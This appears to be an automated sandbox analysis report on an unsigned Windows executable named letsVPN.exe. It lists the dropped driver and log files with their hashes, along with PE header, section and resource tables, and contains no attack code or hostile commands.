                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Generic INItialization configuration [BeginLog]
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58531
                                                                                                                                                                                                  Entropy (8bit):5.206385160976729
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OGdni80C/8g0atRf7yr14ujuNY9AZi3Z/oUtwrzUQ5SE2e3nke2jR4Ui6eja:Own95cdyYloiwnlz2eB2j7eu
                                                                                                                                                                                                  MD5:A1F93E71400ED26C744C66DDFFA965C9
                                                                                                                                                                                                  SHA1:9AE929149D8DAFD2DB8360622FEFAFE019950D01
                                                                                                                                                                                                  SHA-256:5B6F60FD190349C1C8DBB50CC4AA243875BC8FAADF8BD66B4DE228E2D2ED2D11
                                                                                                                                                                                                  SHA-512:8C9192FF49C75A050014FB08F922FA1188B0B83877D7D408B1E33B4BB52CD48E480BF83CE743B46E11FDB5CDBB35A1799934BA1BE92DFCC03C9E120116F875EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):524288
                                                                                                                                                                                                  Entropy (8bit):0.42450821893042967
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:/LvM7mjhRoZO/oAPzImKVYG4cEsu8UDtq9l:jMyoZwImKVYG4cEsu8UDtq9l
                                                                                                                                                                                                  MD5:1DE489CD0112CAF65DE75A4EDD028C69
                                                                                                                                                                                                  SHA1:133C0D45E6DBC65724A8EFBC312198B781E90737
                                                                                                                                                                                                  SHA-256:73CD53B884F67A71ECDFA705A954FD2803B86EEBDAE9701C380F883AB72880FF
                                                                                                                                                                                                  SHA-512:EFE7CDC00C796977D0A1E82E202F931322184C3E356A0B5F3E66DBB63592144B6B1EB5FD5E11B31B29663761F155A66EDEC7DF34772471A112886FB489C59494
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):3474
                                                                                                                                                                                                  Entropy (8bit):5.365220498844006
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3s5pmspmZr:QO00eO00erMwmkB1kAV
                                                                                                                                                                                                  MD5:4A643DB20834F7B72CCDF9D557E9C55D
                                                                                                                                                                                                  SHA1:A1A72CDE327DCBD2CB4B766C74D0DEBF6DD86E8C
                                                                                                                                                                                                  SHA-256:1A0FBE89F1B91E050A45AC5AD7F85AB7FB09817E401A46C8B1C3225390C8A56B
                                                                                                                                                                                                  SHA-512:08DA6DCA777597F9D345962C7D06378DDDA587F475C67E39CB1E1B35002FB6591FD93CC931CCC1CE7D3BEE35158D53CA55559DA009D666DD5844E98888A5A241
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta
                                                                                                                                                                                                  Process:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):110
                                                                                                                                                                                                  Entropy (8bit):4.644932559633425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:jBJFELuwVALZgmBcRICkREpAUWnRthLK5a6eCMABAv:jBJolmKR8TRoJPQv
                                                                                                                                                                                                  MD5:446993FC2ADD57076DB96E84A772E2AA
                                                                                                                                                                                                  SHA1:1BF326E1ACD348A2A7BECC02EE8CE36CB8AA2A96
                                                                                                                                                                                                  SHA-256:F804CF528A8BEEB38F3A4FE62BAAB8C90021C6F1E41265E5FEDE6813DF221069
                                                                                                                                                                                                  SHA-512:BAEDDE2E0711A92DC6DA12E018A86BF70C4CF660F6DCE9E55B2807D5C8F4C85F8915C448C0AA74BC0B2E9BA3242F42C2EDBCAF54A80614871D5606917A75542B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:Windows cannot open the file named C:\ProgramData\s1qGS.xml...The system cannot find the file specified.......
                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.951733059880656
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                  • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                  File name:letsVPN.exe
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5:ef0f5b020ea3238a98642cd7b56d84bb
                                                                                                                                                                                                  SHA1:9bfb209e7d43739cc9dea530680b0c4ecdbf5981
                                                                                                                                                                                                  SHA256:abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
                                                                                                                                                                                                  SHA512:cae5d82e433a68f3e1770ed21cd80479f4fa49fea367e0a6b28a8a5743dbc8feb658bc4c1171c514ce957a34a26c49541403745293b51d13a3c4bcaeca79d3e7
                                                                                                                                                                                                  SSDEEP:393216:eKb0lwDQigr/AwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:twuEiyoWG0DDzWCgin/tB97YF
                                                                                                                                                                                                  TLSH:74771202E78192F9D86DC035869B2B32F7A0B44A4735AAEB6BD153E50B75FC01E3871D
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U7..4YJ.4YJ.4YJ:{.J.4YJ..4J.4YJ.."J.4YJ.4XJ.6YJ.L.J.4YJ.L.J.4YJ.L.JG4YJ.L.J.4YJ.f.J.4YJ.L.J.4YJRich.4YJ.......................
                                                                                                                                                                                                  Icon Hash:804ceccc64ece837
                                                                                                                                                                                                  Entrypoint:0x140062e64
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x6770F00A [Sun Dec 29 06:45:30 2024 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:2
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:2
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:2
                                                                                                                                                                                                  Import Hash:edafe69053cd166dc7264345550f7ddd
                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                  • [ C ] VS2005 build 50727
                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                  • [LNK] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad8b0 | 0x104 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1f8e000 | 0x12d30 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1f84000 | 0x96d8 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x81000 | 0xf40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x7f7c0 | 0x7f800 | a7d57b7d9e7b1994ec5470ae7229cd2d | False | 0.4946997549019608 | zlib compressed data | 6.311975084207791 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x81000 | 0x2f948 | 0x2fa00 | f46b3ca44f6c1aea7e59564f52494ddc | False | 0.2865506069553806 | data | 4.618225905174831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xb1000 | 0x1ed2970 | 0x1ecc400 | f39d5bd6306e5ec255a4cc1d60976d0c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x1f84000 | 0x96d8 | 0x9800 | 750c5041957e88c08b0d0d51b62ce8b5 | False | 0.4538445723684211 | data | 5.746289077799479 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x1f8e000 | 0x12d30 | 0x12e00 | bdb6276c500950cd7f39c21191b247d0 | False | 0.3001215852649007 | data | 4.701905284524863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_CURSOR | 0x1f8f618 | 0x134 | data | English | United States | 0.39935064935064934 |
| RT_CURSOR | 0x1f8f74c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0x1f8f880 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7 |
| RT_CURSOR | 0x1f8f934 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.36363636363636365 |
| RT_CURSOR | 0x1f8fa68 | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.35714285714285715 |
| RT_CURSOR | 0x1f8fb9c | 0x134 | data | English | United States | 0.37337662337662336 |
| RT_CURSOR | 0x1f8fcd0 | 0x134 | data | English | United States | 0.37662337662337664 |
| RT_CURSOR | 0x1f8fe04 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687 |
| RT_CURSOR | 0x1f8ff38 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.37662337662337664 |
| RT_CURSOR | 0x1f9006c | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687 |
| RT_CURSOR | 0x1f901a0 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0x1f902d4 | 0x134 | data | English | United States | 0.44155844155844154 |
| RT_CURSOR | 0x1f90408 | 0x134 | data | English | United States | 0.4155844155844156 |
| RT_CURSOR | 0x1f9053c | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5422077922077922 |
| RT_CURSOR | 0x1f90670 | 0x134 | data | English | United States | 0.2662337662337662 |
| RT_CURSOR | 0x1f907a4 | 0x134 | data | English | United States | 0.2824675324675325 |
| RT_CURSOR | 0x1f908d8 | 0x134 | data | English | United States | 0.3246753246753247 |
| RT_CURSOR | 0x1f90a0c | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.4025974025974026 |
| RT_CURSOR | 0x1f90b40 | 0xb4 | data | English | United States | 0.55 |
| RT_BITMAP | 0x1f90bf4 | 0x1a48 | Device independent bitmap graphic, 550 x 24 x 4, image size 6624 | English | United States | 0.20228894173602854 |
| RT_BITMAP | 0x1f9263c | 0x1c68 | Device independent bitmap graphic, 448 x 32 x 4, image size 7168 | English | United States | 0.3363586358635864 |
| RT_BITMAP | 0x1f942a4 | 0x2468 | Device independent bitmap graphic, 576 x 32 x 4, image size 9216 | English | United States | 0.3572961373390558 |
| RT_BITMAP | 0x1f9670c | 0x768 | Device independent bitmap graphic, 224 x 16 x 4, image size 1792 | English | United States | 0.15664556962025317 |
| RT_BITMAP | 0x1f96e74 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346 |
| RT_BITMAP | 0x1f96f2c | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965 |
| RT_ICON | 0x1f97070 | 0x1ca8 | Device independent bitmap graphic, 48 x 96 x 24, image size 7296 | English | United States | 0.770174482006543 |
| RT_ICON | 0x1f98d18 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.37768817204301075 |
| RT_ICON | 0x1f99000 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325 |
| RT_MENU | 0x1f99128 | 0x12e | data | English | United States | 0.5827814569536424 |
| RT_MENU | 0x1f99258 | 0xd48 | data | English | United States | 0.3552941176470588 |
| RT_MENU | 0x1f99fa0 | 0x64 | Matlab v4 mat-file (little endian) o, numeric, rows 7340176, columns 7340143 | English | United States | 0.84 |
| RT_DIALOG | 0x1f9a004 | 0x33c | data | English | United States | 0.5169082125603864 |
| RT_DIALOG | 0x1f9a340 | 0x3ba | data | English | United States | 0.46540880503144655 |
| RT_DIALOG | 0x1f9a6fc | 0x1d6 | data | English | United States | 0.5574468085106383 |
| RT_DIALOG | 0x1f9a8d4 | 0x1ca | data | English | United States | 0.5589519650655022 |
| RT_DIALOG | 0x1f9aaa0 | 0x222 | data | English | United States | 0.5183150183150184 |
| RT_DIALOG | 0x1f9acc4 | 0x538 | data | English | United States | 0.3787425149700599 |
| RT_DIALOG | 0x1f9b1fc | 0x540 | data | English | United States | 0.3757440476190476 |
| RT_DIALOG | 0x1f9b73c | 0x554 | data | English | United States | 0.3951612903225806 |
| RT_DIALOG | 0x1f9bc90 | 0x550 | data | English | United States | 0.3963235294117647 |
| RT_DIALOG | 0x1f9c1e0 | 0x366 | data | English | United States | 0.46436781609195404 |
| RT_DIALOG | 0x1f9c548 | 0x1c6 | data | English | United States | 0.5969162995594713 |
| RT_DIALOG | 0x1f9c710 | 0x2a0 | data | English | United States | 0.4955357142857143 |
| RT_DIALOG | 0x1f9c9b0 | 0xe8 | data | English | United States | 0.6336206896551724 |
| RT_DIALOG | 0x1f9ca98 | 0x1a2 | data | English | United States | 0.4688995215311005 |
| RT_DIALOG | 0x1f9cc3c | 0x15a | data | English | United States | 0.5057803468208093 |
| RT_DIALOG | 0x1f9cd98 | 0x34 | data | English | United States | 0.9038461538461539 |
| RT_STRING | 0x1f9cdcc | 0xcc | data | English | United States | 0.39215686274509803 |
| RT_STRING | 0x1f9ce98 | 0x4e | data | English | United States | 0.6410256410256411 |
| RT_STRING | 0x1f9cee8 | 0xd6 | data | English | United States | 0.5233644859813084 |
| RT_STRING | 0x1f9cfc0 | 0xd0 | data | English | United States | 0.6346153846153846 |
| RT_STRING | 0x1f9d090 | 0x4be | data | English | United States | 0.30065897858319607 |
| RT_STRING | 0x1f9d550 | 0x44a | data | English | United States | 0.27140255009107467 |
| RT_STRING | 0x1f9d99c | 0x150 | Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0 | English | United States | 0.4851190476190476 |
| RT_STRING | 0x1f9daec | 0xa0 | data | English | United States | 0.55 |
| RT_STRING | 0x1f9db8c | 0x150 | data | English | United States | 0.2976190476190476 |
| RT_STRING | 0x1f9dcdc | 0x62 | data | English | United States | 0.3469387755102041 |
| RT_STRING | 0x1f9dd40 | 0x3a | data | English | United States | 0.6551724137931034 |
| RT_STRING | 0x1f9dd7c | 0x2ae | data | English | United States | 0.3556851311953353 |
| RT_STRING | 0x1f9e02c | 0x260 | data | English | United States | 0.0805921052631579 |
| RT_STRING | 0x1f9e28c | 0x330 | data | English | United States | 0.3492647058823529 |
| RT_STRING | 0x1f9e5bc | 0x27c | data | English | United States | 0.33176100628930816 |
| RT_STRING | 0x1f9e838 | 0x106 | data | English | United States | 0.5763358778625954 |
| RT_STRING | 0x1f9e940 | 0xda | data | English | United States | 0.43119266055045874 |
| RT_STRING | 0x1f9ea1c | 0x46 | data | English | United States | 0.7428571428571429 |
| RT_STRING | 0x1f9ea64 | 0xc6 | data | English | United States | 0.41919191919191917 |
| RT_STRING | 0x1f9eb2c | 0x1f8 | data | English | United States | 0.36706349206349204 |
| RT_STRING | 0x1f9ed24 | 0xae | data | English | United States | 0.5689655172413793 |
